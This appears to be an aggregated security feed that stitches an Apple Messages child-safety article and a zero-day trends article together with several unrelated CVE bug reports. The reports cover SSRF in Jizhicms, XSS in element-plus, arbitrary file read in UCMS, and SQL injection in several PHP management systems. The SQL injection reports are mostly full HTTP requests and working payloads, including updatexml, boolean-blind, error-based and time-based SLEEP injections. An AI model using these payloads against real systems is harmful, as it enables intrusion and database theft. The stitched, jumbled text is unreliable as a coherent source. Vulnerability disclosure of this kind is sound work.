Apple will soon be rolling out its promised child safety features in the Messages app for users in Australia, Canada, New Zealand, and the UK
The post Apple’s child safety features are coming to a Messages app near you appeared first on Malwarebytes Labs.

![Apple’s child safety features are coming to a Messages app near you](https://blog.malwarebytes.com/wp-content/uploads/2022/04/GettyImages-1200217290-900x506.jpg)

Posted: April 25, 2022 by

Apple will soon be rolling out its promised child safety features in the Messages app for users in Australia, Canada, New Zealand, and the UK. The announcement comes four months after the features’ initial launch in the US on the iOS, iPad, and macOS devices.

To make communicating with Messages safer for Apple’s youngest users in the countries getting the rollout, it will start using machine learning to scan messages sent to and from an Apple device, looking for nudity to blur. Because scanning is done on-device, meaning the images are analyzed by the phone rather than in the Cloud, end-to-end encryption is not compromised.

“Messages analyses image attachments and determines if a photo contains nudity, while maintaining the end-to-end encryption of the messages,” Apple said in a statement. “The feature is designed so that no indication of the detection of nudity ever leaves the device. Apple does not get access to the messages, and no notifications are sent to the parent or anyone else.”

Of course, parents would have to enable this feature on their child’s iPhones first.

![](https://blog.malwarebytes.com/wp-content/uploads/2022/04/apple-child_safety-600x378.jpg)

Children are given the power to make a safe choice with what they want to see and do on Messages. (Source: Apple)

If the setting for this feature is on and a child receives a nude photo, Messages blurs it, warns the child of sensitive content, and points them to resources supported by child safety groups. If the child is about to send nude photos, the feature flags the picture and encourages them not to send the image. They could also talk to an adult they trust using the “Message a Grown-Up” button.

Note that the AI does not scan photos your child keeps in their Photo Library.

There have been some changes to these features since they were initially reported in August last year. Originally parents were also alerted if their young child (a child under 13) sent or received images that contained nudity. Privacy advocates and critics quickly pointed out that doing this could out queer kids to their parents, which could expose them to harm.

Apple is also delaying the rollout of an AI component that can scan photos in iCloud and compare them to a child sexual abuse material (CSAM) database. The company has yet to announce the date of this component’s release.

According to The Guardian, Apple will also introduce features that will kick in when users search for child exploitation content in Spotlight, Siri, and Safari.

**How to enable Apple’s safety features**

Parents/Carers/Guardians, you need to set up Apple’s Screen Time feature on your child’s phone first, which requires Family Sharing (If you haven’t done that already, go to the Set up Family Sharing help page for the steps).

Once you have Screen Time enabled and the communications safety features are already available in your country, please do the following:

1.  On your Apple device, open **Settings**.
2.  Choose **Screen Time**.
3.  Swipe down and choose your child’s device.
4.  Choose **Communications Safety**.
5.  Toggle **Check for Sensitive Photo**.

Stay safe!

**RELATED ARTICLES**

![“Your AppI‌e‌ ‌l‌D‌ ‌‌h‌‌a‌‌s‌‌ ‌‌b‌‌e‌‌e‌‌n‌‌ ‌‌l‌‌ocke‌‌d‌‌” spam email takes you on a website mystery tour](https://blog.malwarebytes.com/wp-content/uploads/2019/03/shutterstock_711671914-604x270.jpg)

April 14, 2022 - We take a look at what appears to be a phish, but ends up directing you to endless random websites instead.

![A week in security (March 28 – April 3)](https://blog.malwarebytes.com/wp-content/uploads/2018/01/shutterstock_610335074-604x270.jpg)

April 4, 2022 - The most important and interesting security stories from the last seven days.

![Update now! Apple patches two zero-day vulnerabilities that may have been actively exploited](https://blog.malwarebytes.com/wp-content/uploads/2021/06/patch_Apple-604x270.png)

April 1, 2022 - Apple released security updates for macOS Monterey 12.3.1, iOS 15.4.1, iPadOS 15.4.1, tvOS 15.4.1, and watchOS 8.5.1 patching 2 vulnerabilities that may have been exploited in the wild.

![De-Googling Carey Parker’s (and your) life: Lock and Code S03E06](https://blog.malwarebytes.com/wp-content/uploads/2021/12/Lock-and-Code-logo-2021-604x270.jpg)

March 14, 2022 - This week on Lock and Code, we talk about taking the right steps to removing Google and its many services from your life.

![Apple fixes Mac bug that could have allowed takeover of webcams and browser tabs](https://blog.malwarebytes.com/wp-content/uploads/2016/04/apple-mac-macbook-feature-604x270.jpg)

January 27, 2022 - A researcher discovered a way to gain control of both webcams and any open session in Safari. How did they do it?

Apple’s child safety features are coming to a Messages app near you

Jizhicms v1.9.5 was discovered to contain a Server-Side Request Forgery (SSRF) vulnerability via /admin.php/Plugins/update.html.

Thank you for your letter ! The Version 2.0 supports changing the plug-in address. If you want the system to download a file, you can forge an address and add your special file. You can download it directly without such complexity. The plug-in module itself has permission control. If you do not have background permission, you will not be able to download plug-ins. Thank you again for your suggestions, but I'm sorry that the plug-in function model does not require downloading the specified files, but wants to download any files that the administrator wants to download. This is the original intention of my plug-in design. Keeping the administrator account well will be everyone's responsibility. If you lose the background account, you will lose everything.

…

\------------------&nbsp;原始邮件&nbsp;------------------ 发件人: "Cherry-toto/jizhicms" \*\*\*@\*\*\*.\*\*\*&gt;; 发送时间:&nbsp;2022年3月18日(星期五) 晚上9:33 \*\*\*@\*\*\*.\*\*\*&gt;; \*\*\*@\*\*\*.\*\*\*&gt;; 主题:&nbsp;\[Cherry-toto/jizhicms\] V1.9.5: SSRF Vulnerability (Issue #67) SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and Intranet ports and attack local and Intranet Jizhicms background. Attackers can use this vulnerability to scan local and Intranet ports, attack local and Intranet services, or carry out DOS attacks The vulnerability is located in the background plug-in download function I start a locally accessible Web service with a flag.php file 使用payload POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.48.135 Content-Length: 93 Accept: application/json, text/javascript, \*/\*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.48.135 Referer: http://192.168.48.135//admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=821f3d50fa8cd84139c76be9 Connection: close action=start-download&amp;filepath=mutisite&amp;download\_url=http%3a%2f%2f127.0.0.1%3a8888%2fflag.php See the response Browser accesshttp://192.168.48.135/cache/update\_mutisite.zip open by notepad As with flag.php, this was read successfully — Reply to this email directly, view it on GitHub, or unsubscribe. Triage notifications on the go with GitHub Mobile for iOS or Android. You are receiving this because you are subscribed to this thread.Message ID: \*\*\*@\*\*\*.\*\*\*&gt;

CVE-2022-27429: V1.9.5: SSRF Vulnerability · Issue #67 · Cherry-toto/jizhicms

element-plus 2.0.5 is vulnerable to Cross Site Scripting (XSS) via el-table-column.

Bug Type: **`Component`**

**Environment**

*   Vue Version: `3.2.13`
*   Element Plus Version: `2.0.5`
*   Browser / OS: `UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
*   Build Tool: `Vue CLI`

**Reproduction****Related Component**

*   `el-table-column`

**Reproduction Link**

Github Repo

**Steps to reproduce**

按照 复现项目的 readme 进行构建  
访问 serve  
在 含有 payload 的 address 的列处中划过光标 就可以触发 js 运行导致 xss

**What is Expected?**

渲染img或者不渲染都可以 但不可以执行 JavaScript

**What is actually happening?**

渲染文本内容为 html 并且执行 JavaScript 脚本

**Additional comments**

elementui plus 是一个大仓库导致有许许多多的前端项目依赖其而构建  
show-overflow-tooltip 已经可以通过 github 代码搜索 找到相关项目 并且其中包含一些部分后台管理项目  
建议通知开发者 更新项目与修复该问题  
此外文档中建议添加相关 安全警告

其他相关信息:  
asjdf/element-table-xss-test#1

Reporter:  
@Esonhugh  
@asjdf

CVE-2022-27103: [Bug Report] [Component] [table-column] table-column 中对于 属性 show-overflow-tooltip 处理存在问题 可以导致 XSS · Issue #6514 · element-plus/element-plus

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
If you pay attention to the video game community as much as I do, you’ve been closely following the ongoing legal battle between Apple and Epic over the sale of “Fortnite” on the Apple App Store. (I promise...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Source newsletter (April 21, 2022) — Sideloading apps is as safe as you make it

Ransomware and other financially motivated threat actors joined nation-state-backed groups in leveraging unpatched flaws in attack campaigns, new data shows.

Threat actors exploited more zero-day vulnerabilities in 2021 than any prior year and mostly in software from Microsoft, Google, and Apple.

State-backed advanced persistent threat actors remained the most prolific users of these exploits as has always been the case to date. However, they were not the only ones: financially motivated groups — particularly ransomware operators — sharply ramped up their use of zero-days and accounted for one in three of attackers exploiting these vulnerabilities.

Two separate advisories this week — one from Mandiant and the other from Google's Project Zero security team — identified a big jump last year in software flaws that threat actors exploited before a patch became available. Mandiant counted a total of 80 such flaws in 2021, while Google identified 58 zero-days that were exploited in the wild before being patched.

By Mandiant's count, the 80 zero-day exploits in 2021 represented a 167% increase over the 30 it logged in 2020, and it more than doubled the previous highest number of 32 in 2019. The 58 zero-day exploits that Google counted represented more than double the 25 that company observed in 2020. It was also more than double Google's highest-ever total of 28 zero-days back in 2015.

Vulnerabilities in Microsoft, Google, and Apple accounted for 75% of the zero-days that threat actors exploited last year — a number likely tied to the broad use and popularity of technologies from these three vendors, Mandiant said. A spreadsheet of zero-day flaws that Google has maintained since 2014 shows that 16 of the 58 zero-day exploits the company observed last year were in its own technologies; 21 involved Microsoft products; and 13 were in Apple products. The remaining vulnerabilities involved products from a total of nine other vendors including Qualcomm, Trend Micro, Sonic Wall, Accellion (now Kiteworks), and Pulse Secure, Mandiant said.

    

Source: Mandiant

The data underscores how organizations cannot ignore the potential for threat actors to hunt for and exploit zero-days in less widely used technologies, says James Sadowski, principal analyst at Mandiant.

"While popular vendors remain popular targets for zero-day exploitation, we've gradually seen expansion of both technologies and vendors targeted by zero-day exploitation outside of main vendors," he says.

"Like we observed in the exploitation of Accellion FTA, threat actors can exploit vulnerabilities in these systems and cause significant damage," Sadowski says, referring to a zero-day flaw in a near obsolete Accellion product that led to breaches at multiple large companies.

**Many Reasons Why**  
Mandiant identified multiple potential reasons for the explosion in threat actor use of zero-day exploits last year. The company perceived the increased enterprise adoption of cloud, mobile, and IoT technologies as increasing the volume of software that organizations are using and therefore resulting in the discovery of more bugs. The increase in the number of so-called exploit brokers trading in zero-day vulnerabilities has also been a factor, as have increased investments in research and development by zero-day exploits threat groups. Google, meanwhile, attributed the surge to improved detection and disclosure of zero-day bugs — a factor that Mandiant too said was likely at play.

The security vendor's analysis showed that state-sponsored groups — especially those from China — continue to dominate zero-day exploit use. But there was a noticeable increase in the number of ransomware and other financially motivated threat groups leveraging zero-days in their attacks.

Sadowski says these threat actors are likely acquiring zero-day exploits via underground exploit brokers and criminal service providers. Or they could be recruiting the requisite talent in-house to research vulnerabilities and develop zero-day exploits, as appeared to be the case with the Conti ransomware group — leaked Conti chat files showed the threat actors discussing recently disclosed vulnerabilities and assigning members to build a scanner to identify potentially vulnerable systems.

"As ransomware groups collect increasingly large sums from their operations, we have observed them more frequently employ zero-day exploits in their operations," Sadowski says. Generally, though, it is extremely difficult to identify where a threat actor might have acquired a zero-day exploit, he says.

Bud Broomhead, CEO at Viakoo, says the increased use of zero-day exploits shows that threat actors are shifting their attack vectors away from vulnerabilities that traditional threat assessment and detection solutions would uncover. "That's why not just zero-day threats, but also exploiting IoT vulnerabilities and leveraging open source software, are rapidly growing enterprise threats," he says. The challenge for organizations is figuring out how to limit damage from a successful zero-day breach and figuring out how to protect against exploits targeting new attack vectors.

The growing use of zero-days highlights the need for organizations to have rapid, out-of-band patching capabilities, says John Bambenek, principal threat hunter at Netenrich.

"Organizations need to remain flexible and agile getting these into production," he says. "Remove as many barriers as possible to patching, including streamlining testing and change management."

Zero-Day Exploit Use Exploded in 2021

UCMS v1.6 was discovered to contain an arbitrary file read vulnerability.

When we look at the root directory of the website, we find that there is a 1.txt file, and the content of the txt file is hack by www

We send a request packet to read the file and change the parameter of dir to "/" to read the contents of the 1.txt file. There is no restriction on the parameter of dir here, which leads to the emergence of arbitrary file reading vulnerability.

    GET /ucms_1.6/ucms/index.php?do=sadmin_fileedit&dir=/&file=1.txt HTTP/1.1
    Host: 192.168.1.101
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.1.101/ucms_1.6/ucms/index.php?do=sadmin_file&dir=/ucms_1.6
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: admin_adc3f8=admin; psw_adc3f8=97376f13bb0b37ffdc31255d275d609c; token_adc3f8=8945ab62
    Connection: close

CVE-2022-28444: bug_report/Arbitrary-file-reading-1.md at main · k0xx11/bug_report

Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.

Permalink

Cannot retrieve contributors at this time

**Purchase-order-management-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability File: \\purchase\_order\\classes\\Master.php?f=delete\_item

Vulnerability location: /purchase\_order/classes/Master.php?f=delete\_item, id

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

POST /purchase\_order/classes/Master.php?f\=delete\_item HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/purchase\_order/admin/?page=items
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sils4jibq9sp4e2n7i4joq8to7
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-28022: bug_report/SQLi-1.md at main · k0xx11/bug_report

Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via /hocms/classes/Master.php?f=delete_member.

Permalink

Cannot retrieve contributors at this time

**Home Owners Collection Management System has SQL injection vulnerability**

vendor : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html

Vulnerability file: /hocms/classes/Master.php?f=delete\_member

Vulnerability location: /hocms/classes/Master.php?f=delete\_member,id

\[+\]Payload: id=2' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /hocms/classes/Master.php?f=delete_member HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/hocms/admin/?page=members
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=2' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=2' RLIKE (SELECT (CASE WHEN (9537=9537) THEN 2 ELSE 0x28 END))-- lLzj
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2' AND (SELECT 2052 FROM(SELECT COUNT(\*),CONCAT(0x7162716b71,(SELECT (ELT(2052\=2052,1))),0x717a627a71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- kJBi

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=2' AND (SELECT 8581 FROM (SELECT(SLEEP(5)))WkHC)-- dgcN
\---

CVE-2022-28414: bug_report/SQLi-1.md at main · k0xx11/bug_report

Simple Real Estate Portal System v1.0 was discovered to contain a SQL injection vulnerability via /reps/classes/Users.php?f=delete_agent.

Permalink

Cannot retrieve contributors at this time

**Simple Real Estate Portal System v1.0 has a SQL injection vulnerability**

vendors: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html

Vulnerability file: /reps/classes/Users.php?f=delete\_agent

Vulnerability location: /reps/classes/Users.php?f=delete\_agent , id

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point

    POST /reps/classes/Users.php?f=delete_agent HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/reps/admin/?page=agents
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b7n0d4rju88m3p50kmalnvn6ti
    Connection: close
    
    id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=1' RLIKE (SELECT (CASE WHEN (7043=7043) THEN 1 ELSE 0x28 END))-- nmnX
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8027 FROM(SELECT COUNT(\*),CONCAT(0x7171717871,(SELECT (ELT(8027\=8027,1))),0x716a6b6271,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- WTeh

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=1' AND (SELECT 9988 FROM (SELECT(SLEEP(5)))oDDv)-- XFnj
\---

CVE-2022-28410: bug_report/SQLi-4.md at main · k0xx11/bug_report

Car Driving School Management System v1.0 was discovered to contain a SQL injection vulnerability via /cdsms/classes/Master.php?f=delete_enrollment.

Permalink

Cannot retrieve contributors at this time

**Car driving school management system has a SQL injection vulnerability.**

vendors: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html

Vulnerability file: /cdsms/classes/Master.php?f=delete\_enrollment

Vulnerability location: /cdsms/classes/Master.php?f=delete\_enrollment, id

\[+\]Payload: id=5' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /cdsms/classes/Master.php?f=delete_enrollment HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/cdsms/admin/?page=enrollees
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=5' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=5' RLIKE (SELECT (CASE WHEN (2063=2063) THEN 5 ELSE 0x28 END))-- tmvi
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=5' AND EXTRACTVALUE(3533,CONCAT(0x5c,0x71767a6b71,(SELECT (ELT(3533\=3533,1))),0x716a6b7871))\-- tQbt

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=5' AND (SELECT 1981 FROM (SELECT(SLEEP(5)))mXOm)-- Mmee
\---

Tag

#apple